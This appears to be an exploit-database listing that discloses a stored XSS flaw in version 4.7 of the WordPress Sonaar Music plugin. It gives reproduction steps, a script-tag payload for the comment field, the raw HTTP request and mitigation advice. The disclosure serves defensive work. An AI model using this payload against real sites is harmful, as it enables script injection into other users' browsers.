Wordpress Sonaar Music Plugin 4.7 - Stored XSS

vendor:

Wordpress Sonaar Music Plugin

by:

Furkan Karaarslan

4.1

CVSS

MEDIUM

Stored XSS

CWE

Product Name: Wordpress Sonaar Music Plugin

Affected Version From: 4.7

Affected Version To: 4.7

Patch Exists: NO

Related CWE:

CPE: a:sonaar_music:sonaar_music_plugin:4.7

Metasploit:

Other Scripts:

Platforms Tested: Windows, Linux

2023

WordPress Sonaar Music Plugin 4.7 – Stored XSS

This exploit allows an attacker to execute arbitrary JavaScript code in the context of a user's browser by injecting a malicious payload into the comment section of a published page in the Wordpress Sonaar Music Plugin 4.7. The payload used in this example is <script>alert("XSS")</script>.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before displaying it on web pages. Additionally, implementing a Content Security Policy (CSP) can help prevent the execution of malicious scripts.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS
# Date: 2023-09-05
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php
# Version: 4.7 (REQUIRED)
# Tested on: Windows/Linux
----------------------------------------------------------------------------------------------------
1-First install sonar music plugin.
2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist
3-Press the Add new playlist button
4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist
5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/
6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>
Bingoo

Request:
POST /wp/wordpress/wp-comments-post.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 155
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/wp/wordpress/album_slug/test/
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486
Connection: close

comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5